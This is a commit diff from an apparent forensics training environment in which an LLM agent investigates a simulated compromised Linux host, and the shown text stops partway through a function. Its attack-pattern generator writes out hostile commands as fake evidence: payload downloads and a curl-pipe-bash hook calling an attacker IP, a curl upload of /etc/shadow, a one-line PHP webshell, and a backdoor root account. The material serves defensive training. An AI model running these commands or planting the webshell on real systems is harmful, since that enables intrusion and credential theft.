Spaces:

yashppawar
/

forensic-shell

Sleeping

App Files Files Community

yashppawar committed on Apr 11

Commit

c36ffd2

verified ·

1 Parent(s): 4581fcf

Upload folder using huggingface_hub

Browse files

Files changed (11) hide show

agents/__init__.py +5 -0
agents/llm_policy.py +337 -0
openenv_forensic_shell.egg-info/PKG-INFO +3 -0
openenv_forensic_shell.egg-info/SOURCES.txt +8 -0
openenv_forensic_shell.egg-info/requires.txt +3 -0
pyproject.toml +10 -12
server/attack_patterns.py +288 -0
server/forensic_shell_environment.py +128 -15
server/grader.py +18 -1
server/name_pools.py +62 -0
server/scenario_generator.py +315 -0

agents/__init__.py ADDED Viewed

	@@ -0,0 +1,5 @@

+"""
+Agent policies for ForensicShell. Shared between inference.py (hackathon
+entry point) and rl/rollout.py (training data collector) so both emit
+identical action distributions.
+"""

agents/llm_policy.py ADDED Viewed

	@@ -0,0 +1,337 @@

+"""
+Shared LLM-backed policy.
+Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
+turns a ForensicShellObservation + episode context into a ForensicShellAction.
+Used by inference.py (baseline submission script) and by rl/rollout.py
+(training data collector). Both call sites share parsing + fallback logic so
+bugs never drift between them.
+The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
+  - Groq / HF Router quota is exhausted
+  - Running in CI (no outbound network)
+  - Doing a quick smoke test
+"""
+from __future__ import annotations
+import json
+import re
+import textwrap
+from dataclasses import dataclass, field
+from typing import Any, Dict, List, Optional, Protocol
+from openai import OpenAI
+from forensic_shell.models import (
+    ForensicReport,
+    ForensicShellAction,
+    ForensicShellObservation,
+    TimelineEvent,
+)
+# Kill-chain phase labels accepted in a report timeline. parse_action keeps a
+# timeline entry only if its "phase" is a member of this set.
+VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
+# Default system message for LLMPolicy (see its `system_prompt` field). This is
+# runtime text sent to the model, so any edit here changes model behavior.
+SYSTEM_PROMPT = textwrap.dedent(
+    """
+    You are a digital forensics investigator with shell-like read-only access
+    to a compromised Linux host. Investigate by calling actions and then submit
+    a final ForensicReport.
+    Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
+    Allowed actions:
+      {"action_type": "list_dir",     "path": "/some/dir"}
+      {"action_type": "read_file",    "path": "/some/file", "max_bytes": 2048}
+      {"action_type": "grep",         "pattern": "substring", "path": "/some/file"}
+      {"action_type": "stat",         "path": "/some/file"}
+      {"action_type": "submit_report","report": {
+           "compromised_user": "alice",
+           "initial_ip": "198.51.100.77",
+           "modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
+           "backdoor_sha256": "abcdef...",
+           "timeline": [
+               {"phase": "login",       "detail": "ssh from ..."},
+               {"phase": "recon",       "detail": "whoami; id"},
+               {"phase": "privesc",     "detail": "sudo ..."},
+               {"phase": "persistence", "detail": "crontab ..."},
+               {"phase": "exfil",       "detail": "curl POST ..."}
+           ]
+      }}
+    Rules:
+      - Output EXACTLY ONE JSON object. No commentary, no markdown.
+      - Start with list_dir on /var/log and /home to orient yourself.
+      - Read /var/log/auth.log to find the compromised user and source IP.
+      - For medium/hard tasks, also find modified files and use 'stat' to
+        compute the backdoor SHA256 (the stat action returns sha256).
+      - For the hard task, reconstruct the attacker's kill chain as an ordered
+        timeline: login -> recon -> privesc -> persistence -> exfil.
+      - Submit only once you are confident — submit_report ends the episode.
+      - You have a strict step budget; do not waste actions.
+    """
+).strip()
+# ---------------------------------------------------------------------------
+# Action parsing helpers — shared between real and mock policies
+# ---------------------------------------------------------------------------
+def parse_action(raw: str) -> ForensicShellAction:
+    """
+    Robustly parse an LLM reply (or any JSON-ish string) into a
+    ForensicShellAction.
+    The reply may be wrapped in markdown fences or surrounded by prose: only
+    the span from the first "{" to the last "}" is decoded. A reply that does
+    not decode to a JSON object, or that the action model rejects, yields the
+    no-op list_dir('/') so a malformed reply never raises into the caller.
+    Args:
+        raw: Raw model output; may be empty.
+    Returns:
+        The parsed action, or list_dir('/') on any parse/validation failure.
+    """
+    fallback = ForensicShellAction(action_type="list_dir", path="/")
+    if not raw:
+        return fallback
+    text = raw.strip()
+    # Slicing to the outermost braces already discards ``` fences, language
+    # tags and surrounding prose, so no separate fence stripping is needed
+    # (the previous fence logic could drop the opening "{" of a fenced reply).
+    first, last = text.find("{"), text.rfind("}")
+    if first != -1 and last > first:
+        text = text[first : last + 1]
+    try:
+        data = json.loads(text)
+    except (ValueError, RecursionError):
+        return fallback
+    # json.loads happily returns lists, strings, numbers or None; only an
+    # object can describe an action.
+    if not isinstance(data, dict):
+        return fallback
+    action_type = data.get("action_type") or data.get("type") or "list_dir"
+    report_obj: Optional[ForensicReport] = None
+    report_data = data.get("report")
+    if isinstance(report_data, dict):
+        report_obj = _parse_report(report_data)
+    # A bad max_bytes should not discard an otherwise valid action.
+    try:
+        max_bytes = int(data.get("max_bytes") or 2048)
+    except (TypeError, ValueError, OverflowError):
+        max_bytes = 2048
+    try:
+        return ForensicShellAction(
+            action_type=action_type,
+            path=data.get("path"),
+            pattern=data.get("pattern"),
+            max_bytes=max_bytes,
+            report=report_obj,
+        )
+    except Exception:
+        # Validation errors come from the project model; whatever it raises,
+        # the contract is to degrade to the no-op action.
+        return fallback
+def _parse_report(report_data: Dict[str, Any]) -> ForensicReport:
+    """Build a ForensicReport from a decoded "report" object, dropping malformed parts."""
+    raw_timeline = report_data.get("timeline")
+    if not isinstance(raw_timeline, list):
+        # A scalar here used to raise TypeError when iterated.
+        raw_timeline = []
+    clean_tl: List[TimelineEvent] = []
+    for item in raw_timeline:
+        if not isinstance(item, dict):
+            continue
+        phase = item.get("phase")
+        # The str check also protects the set lookup from unhashable values.
+        if isinstance(phase, str) and phase in VALID_PHASES:
+            clean_tl.append(TimelineEvent(phase=phase, detail=str(item.get("detail", ""))))
+    raw_files = report_data.get("modified_files") or []
+    if isinstance(raw_files, str):
+        # list("abc") would split a single path into characters.
+        raw_files = [raw_files]
+    try:
+        return ForensicReport(
+            compromised_user=report_data.get("compromised_user"),
+            initial_ip=report_data.get("initial_ip"),
+            modified_files=list(raw_files),
+            backdoor_sha256=report_data.get("backdoor_sha256"),
+            timeline=clean_tl,
+        )
+    except Exception:
+        # Best effort: an unusable report becomes an empty one rather than
+        # aborting the submit action.
+        return ForensicReport()
+def action_to_str(action: ForensicShellAction) -> str:
+    """Render an action as a compact call-style string, e.g. "stat('/etc/passwd')"."""
+    kind = action.action_type
+    if kind == "list_dir":
+        rendered = f"list_dir({action.path!r})"
+    elif kind == "read_file":
+        rendered = f"read_file({action.path!r},{action.max_bytes})"
+    elif kind == "grep":
+        rendered = f"grep({action.pattern!r},{action.path!r})"
+    elif kind == "stat":
+        rendered = f"stat({action.path!r})"
+    elif kind == "submit_report":
+        # The report body is deliberately elided.
+        rendered = "submit_report(...)"
+    else:
+        # Unknown verbs are shown as-is.
+        rendered = kind
+    return rendered
+# ---------------------------------------------------------------------------
+# Policy protocol
+# ---------------------------------------------------------------------------
+class PolicyProtocol(Protocol):
+    # Structural interface shared by LLMPolicy and MockPolicy: a `name`
+    # attribute plus an `act` method with the signature below, which maps the
+    # latest observation (and the caller's history/step counter) to an action.
+    name: str
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction: ...
+# ---------------------------------------------------------------------------
+# Real LLM-backed policy
+# ---------------------------------------------------------------------------
+@dataclass
+class LLMPolicy:
+    """
+    Policy that asks an OpenAI-compatible chat endpoint for the next action.
+    Each call sends exactly two messages: the system prompt and a freshly
+    built user prompt. Episode context reaches the model only through the
+    observation fields and the trailing `history` lines.
+    """
+    client: OpenAI
+    model: str
+    name: str = "llm"
+    temperature: float = 0.2
+    max_tokens: int = 700
+    system_prompt: str = SYSTEM_PROMPT
+    def _build_user_prompt(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> str:
+        """
+        Render the per-step user message.
+        Contains the task description, the step counters, the last action's
+        error and output (output truncated to 1500 characters) and the last
+        six history lines.
+        """
+        history_block = "\n".join(history[-6:]) if history else "(none yet)"
+        last_output = (observation.output or "")[:1500]
+        # Assembled line by line instead of dedent-ing one big f-string:
+        # interpolated multi-line values (tool output, history) start at
+        # column 0, so textwrap.dedent would find no common margin and leave
+        # every template line indented in the prompt.
+        parts = [
+            f"TASK: {observation.task_description}",
+            f"Step: {step}",
+            f"Steps remaining (including this one): {observation.steps_remaining}",
+            f"Last action error: {observation.action_error or 'none'}",
+            "Last action output:",
+            "---",
+            last_output,
+            "---",
+            "Recent history:",
+            history_block,
+            "Reply with ONE JSON action object only.",
+        ]
+        return "\n".join(parts).strip()
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction:
+        """
+        Query the model once and parse its reply into an action.
+        Any failure of the API call (including an empty `choices` list) is
+        logged and treated as an empty reply, which parse_action handles.
+        """
+        user_prompt = self._build_user_prompt(observation, history, step)
+        try:
+            completion = self.client.chat.completions.create(
+                model=self.model,
+                messages=[
+                    {"role": "system", "content": self.system_prompt},
+                    {"role": "user", "content": user_prompt},
+                ],
+                temperature=self.temperature,
+                max_tokens=self.max_tokens,
+                stream=False,
+            )
+            raw = (completion.choices[0].message.content or "").strip()
+        except Exception as exc:  # pragma: no cover - network-dependent
+            # Deliberately broad: this is the network boundary and the episode
+            # must continue even when the provider errors out.
+            print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
+            raw = ""
+        return parse_action(raw)
+# ---------------------------------------------------------------------------
+# Mock / heuristic policy — no LLM required
+# ---------------------------------------------------------------------------
+# Matches an sshd 'Accepted password|publickey for <user> from <addr> port'
+# log fragment. Group 1 is the user name, group 2 the source address.
+_ACCEPTED_RE = re.compile(
+    r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
+)
+@dataclass
+class MockPolicy:
+    """
+    Rule-based, no-network policy. Follows a fixed investigation recipe and
+    submits based on whatever it observed. Used as a resilient fallback in
+    inference.py when no API key is present and in CI where outbound network
+    is blocked.
+    The underscore-prefixed fields are per-episode scratch state that
+    _reset_plan rebuilds; callers are not expected to pass them in.
+    """
+    name: str = "mock"
+    _plan: List[ForensicShellAction] = field(default_factory=list)
+    _step: int = 0
+    _observed_user: Optional[str] = None
+    _observed_ip: Optional[str] = None
+    _observed_sha: Optional[str] = None
+    _observed_paths: List[str] = field(default_factory=list)
+    @staticmethod
+    def _is_rfc1918(ip: str) -> bool:
+        """Return True for 10/8, 172.16/12 and 192.168/16 style addresses."""
+        if ip.startswith(("10.", "192.168.")):
+            return True
+        octets = ip.split(".")
+        # 172.16.0.0/12 spans second octets 16..31, not just "172.16.".
+        if len(octets) == 4 and octets[0] == "172" and octets[1].isdigit():
+            return 16 <= int(octets[1]) <= 31
+        return False
+    def _reset_plan(self) -> None:
+        """Install the fixed action recipe and clear everything harvested so far."""
+        self._plan = [
+            ForensicShellAction(action_type="list_dir", path="/var/log"),
+            ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
+            ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
+            ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
+            ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
+            ForensicShellAction(action_type="list_dir", path="/var/www/html"),
+            ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
+            ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
+            ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
+            ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
+            ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
+            ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
+        ]
+        self._step = 0
+        self._observed_user = None
+        self._observed_ip = None
+        self._observed_sha = None
+        self._observed_paths = []
+    def _harvest(self, observation: ForensicShellObservation) -> None:
+        """
+        Extract login and stat evidence from the latest observation output.
+        Login: the first accepted login from a non-RFC1918 address wins; a
+        private-address login is only used while nothing has been recorded.
+        Stat: output carrying a non-empty `sha256=` line contributes its
+        `path=` lines to the modified-file list; the first digest seen is kept
+        as the backdoor hash.
+        """
+        lines = (observation.output or "").splitlines()
+        for line in lines:
+            m = _ACCEPTED_RE.search(line)
+            if not m:
+                continue
+            user, ip = m.group(1), m.group(2)
+            if not self._is_rfc1918(ip):
+                self._observed_user = user
+                self._observed_ip = ip
+                break
+            if self._observed_user is None:
+                self._observed_user = user
+                self._observed_ip = ip
+        sha = next(
+            (ln.split("=", 1)[1].strip() for ln in lines if ln.startswith("sha256=")),
+            "",
+        )
+        if not sha:
+            # No digest (or an empty one): not a successful file stat.
+            return
+        if self._observed_sha is None:
+            self._observed_sha = sha
+        # Paths are recorded for every stat'ed file, not only the first one;
+        # previously this sat under the sha-is-None gate and the list could
+        # never grow beyond a single entry.
+        for ln in lines:
+            if ln.startswith("path="):
+                p = ln.split("=", 1)[1].strip()
+                if p and p not in self._observed_paths:
+                    self._observed_paths.append(p)
+    def _final_submit(self) -> ForensicShellAction:
+        """Build the submit_report action from whatever has been harvested."""
+        timeline = [
+            TimelineEvent(phase=p, detail="auto")
+            for p in ("login", "recon", "privesc", "persistence", "exfil")
+        ]
+        report = ForensicReport(
+            compromised_user=self._observed_user,
+            initial_ip=self._observed_ip,
+            modified_files=list(self._observed_paths),
+            backdoor_sha256=self._observed_sha,
+            timeline=timeline,
+        )
+        return ForensicShellAction(action_type="submit_report", report=report)
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction:
+        """
+        Return the next planned action, or the final report once the plan is
+        exhausted. `history` is accepted for interface compatibility only.
+        """
+        # Also (re)build when no plan exists yet, so a caller whose first step
+        # is not numbered 1 does not immediately submit an empty report.
+        if step == 1 or not self._plan:
+            self._reset_plan()
+        self._harvest(observation)
+        if self._step < len(self._plan):
+            action = self._plan[self._step]
+            self._step += 1
+            return action
+        return self._final_submit()

openenv_forensic_shell.egg-info/PKG-INFO CHANGED Viewed

@@ -4,6 +4,9 @@ Version: 0.1.0
 Summary: Forensic Shell environment for OpenEnv
 Requires-Python: >=3.10
 Requires-Dist: openenv-core[core]>=0.2.2
 Provides-Extra: dev
 Requires-Dist: pytest>=8.0.0; extra == "dev"
 Requires-Dist: pytest-cov>=4.0.0; extra == "dev"

 Summary: Forensic Shell environment for OpenEnv
 Requires-Python: >=3.10
 Requires-Dist: openenv-core[core]>=0.2.2
+Requires-Dist: openai>=1.40.0
 Provides-Extra: dev
 Requires-Dist: pytest>=8.0.0; extra == "dev"
 Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
+Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
+Requires-Dist: pytest-socket>=0.7.0; extra == "dev"

openenv_forensic_shell.egg-info/SOURCES.txt CHANGED Viewed

@@ -1,8 +1,13 @@
 README.md
 pyproject.toml
 ./__init__.py
 ./client.py
 ./models.py
 openenv_forensic_shell.egg-info/PKG-INFO
 openenv_forensic_shell.egg-info/SOURCES.txt
 openenv_forensic_shell.egg-info/dependency_links.txt
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
 openenv_forensic_shell.egg-info/top_level.txt
 server/__init__.py
 server/app.py
 server/forensic_shell_environment.py
 server/grader.py
 server/scenarios.py

 README.md
+__init__.py
+client.py
+models.py
 pyproject.toml
 ./__init__.py
 ./client.py
 ./models.py
+agents/__init__.py
+agents/llm_policy.py
 openenv_forensic_shell.egg-info/PKG-INFO
 openenv_forensic_shell.egg-info/SOURCES.txt
 openenv_forensic_shell.egg-info/dependency_links.txt
 openenv_forensic_shell.egg-info/top_level.txt
 server/__init__.py
 server/app.py
+server/attack_patterns.py
 server/forensic_shell_environment.py
 server/grader.py
+server/name_pools.py
+server/scenario_generator.py
 server/scenarios.py

openenv_forensic_shell.egg-info/requires.txt CHANGED Viewed

@@ -1,5 +1,8 @@
 openenv-core[core]>=0.2.2
 [dev]
 pytest>=8.0.0
 pytest-cov>=4.0.0

 openenv-core[core]>=0.2.2
+openai>=1.40.0
 [dev]
 pytest>=8.0.0
 pytest-cov>=4.0.0
+pytest-asyncio>=0.23.0
+pytest-socket>=0.7.0

pyproject.toml CHANGED Viewed

@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
 requires-python = ">=3.10"
 dependencies = [
     # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
-    # install from github
-    # "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
     "openenv-core[core]>=0.2.2",
-    # Environment-specific dependencies
-    # Add all dependencies needed for your environment here
-    # Examples:
-    # "numpy>=1.19.0",
-    # "torch>=2.0.0",
-    # "gymnasium>=0.29.0",
-    # "openspiel>=1.0.0",
-    # "smolagents>=1.22.0,<2",
 ]
 [project.optional-dependencies]
 dev = [
     "pytest>=8.0.0",
     "pytest-cov>=4.0.0",
 ]
 [project.scripts]
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
 [tool.setuptools]
 include-package-data = true
-packages = ["forensic_shell", "forensic_shell.server"]
-package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server" }

 requires-python = ">=3.10"
 dependencies = [
     # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
     "openenv-core[core]>=0.2.2",
+    # ForensicShell needs the OpenAI client for LLM-backed policies
+    "openai>=1.40.0",
 ]
 [project.optional-dependencies]
 dev = [
     "pytest>=8.0.0",
     "pytest-cov>=4.0.0",
+    "pytest-asyncio>=0.23.0",
+    "pytest-socket>=0.7.0",
 ]
 [project.scripts]
 [tool.setuptools]
 include-package-data = true
+packages = [
+    "forensic_shell",
+    "forensic_shell.server",
+    "forensic_shell.agents",
+]
+package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }

server/attack_patterns.py ADDED Viewed

	@@ -0,0 +1,288 @@

+"""
+Attack pattern templates used by the scenario generator.
+Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
+SimpleNamespace with fields: rng, user, ip, host, ts_base, short,
+backdoor_sha256, backdoor_bytes, backdoor_path.
+The callable returns a dict describing:
+  - auth_log_lines:   list[str] appended to /var/log/auth.log
+  - bash_history:     str contents of the compromised user's .bash_history
+  - modified_files:   dict[path, content] — system files changed by the attacker
+  - modified_paths:   list[str] — the subset the grader expects (subset of modified_files)
+  - timeline:         list[dict(phase, detail)] — 5-phase kill chain for hard tier
+  - pattern_tag:      short slug used in task_id
+All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
+looks self-consistent. Nothing here touches global random state.
+"""
+from datetime import timedelta
+def _fmt_ts(ts):
+    """Format a datetime as "Mon DD HH:MM:SS" (e.g. "Jan 05 03:04:05")."""
+    return f"{ts:%b %d %H:%M:%S}"
+# ---------------------------------------------------------------------------
+# Pattern 1 — SSH brute force -> wget payload -> cron persistence
+# ---------------------------------------------------------------------------
+def ssh_brute(ctx):
+    """
+    Build artifacts for the SSH brute-force pattern: three failed password
+    attempts, an accepted password login, a sudo copy of the payload into
+    /usr/local/bin and a cron entry that runs it every minute.
+    Reads ctx.user, ctx.ip, ctx.host, ctx.ts_base, ctx.rng, ctx.short,
+    ctx.backdoor_path and ctx.backdoor_bytes. Returns a dict with
+    pattern_tag, auth_log_lines, bash_history, modified_files, modified_paths
+    and timeline.
+    """
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    # Each source port is a separate ctx.rng draw, taken in list order; for a
+    # seeded rng, reordering these lines would change the generated log.
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}",
+        f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync",
+    ]
+    # Shell history of the compromised user; mirrors the sudo entries above.
+    bash = (
+        f"cd /tmp\n"
+        f"wget -q http://{ip}/payload/.{ctx.short}\n"
+        f"chmod +x .{ctx.short}\n"
+        f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n"
+        f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n"
+        f"history -c\n"
+        f"exit\n"
+    )
+    cron_path = f"/etc/cron.d/{ctx.short}-sync"
+    cron_content = (
+        f"# Managed by deploy\n"
+        f"0 3 * * * root /usr/local/sbin/logrotate.sh\n"
+        f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n"
+    )
+    passwd_content = (
+        f"root:x:0:0:root:/root:/bin/bash\n"
+        f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
+        f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n"  # attacker-added backdoor acct
+    )
+    # NOTE(review): the logs reference /usr/local/bin/.{ctx.short} while the
+    # file itself is stored under ctx.backdoor_path; presumably the generator
+    # sets backdoor_path to match for this pattern, verify against caller.
+    modified_files = {
+        "/etc/passwd": passwd_content,
+        cron_path: cron_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
+        {"phase": "recon", "detail": "whoami; id; uname -a"},
+        {"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
+        {"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
+        {"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
+    ]
+    return dict(
+        pattern_tag="ssh_brute",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
+# ---------------------------------------------------------------------------
+def ssh_key_theft(ctx):
+    """
+    Build artifacts for the stolen-SSH-key pattern: a publickey login, an
+    attacker key appended to authorized_keys and a curl-pipe-bash line
+    appended to the user's .bashrc.
+    Reads ctx.user, ctx.ip, ctx.host, ctx.ts_base, ctx.rng, ctx.backdoor_path
+    and ctx.backdoor_bytes. Returns a dict with pattern_tag, auth_log_lines,
+    bash_history, modified_files, modified_paths and timeline.
+    """
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    # 16 random hex characters standing in for a key fingerprint. This rng
+    # draw happens before the port draw below.
+    fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
+        f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo:    {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
+    ]
+    bash = (
+        f"cat ~/.ssh/authorized_keys\n"
+        f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
+        f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
+        f"chmod 600 ~/.ssh/authorized_keys\n"
+        f"history -c\n"
+    )
+    # Final file contents: the original key line followed by the attacker's.
+    authorized_keys = (
+        f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
+        f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
+    )
+    # The last line is the persistence hook matching the bash history entry.
+    bashrc = (
+        f"# ~/.bashrc\n"
+        f"alias ll='ls -la'\n"
+        f"export PATH=$PATH:/usr/local/bin\n"
+        f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
+    )
+    modified_files = {
+        f"/home/{user}/.ssh/authorized_keys": authorized_keys,
+        f"/home/{user}/.bashrc": bashrc,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
+        {"phase": "recon", "detail": "cat authorized_keys; env"},
+        {"phase": "privesc", "detail": "already had sudo"},
+        {"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
+        {"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
+    ]
+    return dict(
+        pattern_tag="ssh_key_theft",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            f"/home/{user}/.ssh/authorized_keys",
+            f"/home/{user}/.bashrc",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 3 — webshell upload -> php drop -> curl exfil
+# ---------------------------------------------------------------------------
+def webshell(ctx):
+    """
+    Build artifacts for the webshell pattern: a password SSH login, a PHP
+    webshell moved into /var/www/html and a curl POST of /etc/shadow.
+    Args:
+        ctx: Scenario context; this function reads user, ip, host, ts_base,
+            rng, backdoor_path and backdoor_bytes.
+    Returns:
+        dict with pattern_tag, auth_log_lines, bash_history, modified_files,
+        modified_paths and timeline.
+    """
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    shell_path = "/var/www/html/shell.php"
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo:    {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
+    ]
+    bash = (
+        f"curl -sO http://{ip}/shell.php\n"
+        "sudo mv shell.php /var/www/html/shell.php\n"
+        "sudo chown www-data:www-data /var/www/html/shell.php\n"
+        "curl -s http://localhost/shell.php?cmd=id\n"
+        f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
+        "history -c\n"
+    )
+    webshell_content = (
+        b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
+    )
+    # If backdoor_path ever equals shell_path, the later key wins and the
+    # file holds the backdoor bytes; no extra guard is needed for that.
+    modified_files = {
+        shell_path: webshell_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    # dict.fromkeys de-duplicates while preserving order, so such a collision
+    # does not list the same path twice.
+    modified_paths = list(dict.fromkeys([shell_path, ctx.backdoor_path]))
+    timeline = [
+        {"phase": "login", "detail": f"ssh from {ip}"},
+        {"phase": "recon", "detail": "ls /var/www/html; id"},
+        {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
+        {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
+        {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
+    ]
+    return dict(
+        pattern_tag="webshell",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=modified_paths,
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 4 — supply-chain compromised package -> /usr/lib drop
+# ---------------------------------------------------------------------------
+def supply_chain(ctx):
+    """
+    Build artifacts for the supply-chain pattern: a publickey login followed
+    by a global npm install of a package whose postinstall script downloads
+    and runs a payload from the attacker's host.
+    Reads ctx.user, ctx.ip, ctx.host, ctx.ts_base, ctx.rng, ctx.short,
+    ctx.backdoor_path and ctx.backdoor_bytes. Returns a dict with
+    pattern_tag, auth_log_lines, bash_history, modified_files, modified_paths
+    and timeline.
+    """
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    # The package name is drawn from ctx.rng before the port draw below, so
+    # the two draws must stay in this order for a seeded rng.
+    pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}",
+    ]
+    bash = (
+        f"npm view {pkg}\n"
+        f"sudo npm install -g {pkg}\n"
+        f"node -e 'require(\"{pkg}\")'\n"
+        f"ls /usr/lib/node_modules/{pkg}/\n"
+        f"history -c\n"
+    )
+    # Contents of the dropped postinstall script. It fetches the payload to
+    # /tmp/.{ctx.short}, which may differ from ctx.backdoor_path.
